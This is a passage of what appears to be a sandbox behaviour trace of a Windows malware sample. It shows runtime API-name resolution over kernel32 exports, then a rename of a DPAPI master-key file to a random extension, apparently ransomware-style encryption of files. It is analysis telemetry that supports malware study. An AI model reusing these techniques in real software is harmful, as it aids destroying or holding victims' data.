lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.412] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.412] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.413] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.413] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.413] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.413] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.413] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.413] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.413] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.413] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.413] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.413] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.413] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.413] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.413] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.413] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.413] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.413] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.413] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.413] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.413] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.414] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.414] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.414] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.414] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.414] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.414] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.414] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.414] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.414] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.414] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.414] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.414] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.414] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.414] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.414] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.414] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.414] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.414] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.414] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.414] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.415] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.415] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.415] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.415] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.415] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.415] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.415] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.415] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.415] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.415] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.415] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.415] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.415] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.415] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.415] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.415] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.415] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.415] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.415] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.415] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.416] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.416] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.416] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.416] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.416] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.416] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.416] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.416] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.416] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.416] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.416] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.416] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.416] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.416] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.416] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.416] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.416] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.416] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.416] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.417] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.417] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.417] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.417] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.417] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.417] lstrlenA (lpString="DELETEATOM") returned 10 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.417] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.417] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.417] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.417] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.417] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.417] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.417] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.417] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.417] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.417] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.418] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.418] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.418] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.418] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.418] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.418] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.418] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.418] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.418] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.418] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.418] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.418] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.418] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.418] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.418] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.418] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.418] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.418] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.418] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.419] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.419] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.419] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.419] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.419] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.419] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.419] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.419] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.419] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.419] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.419] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.419] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.419] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.419] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.419] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 147 [0078.420] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.ZVKiUJ") returned 154 [0078.420] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js 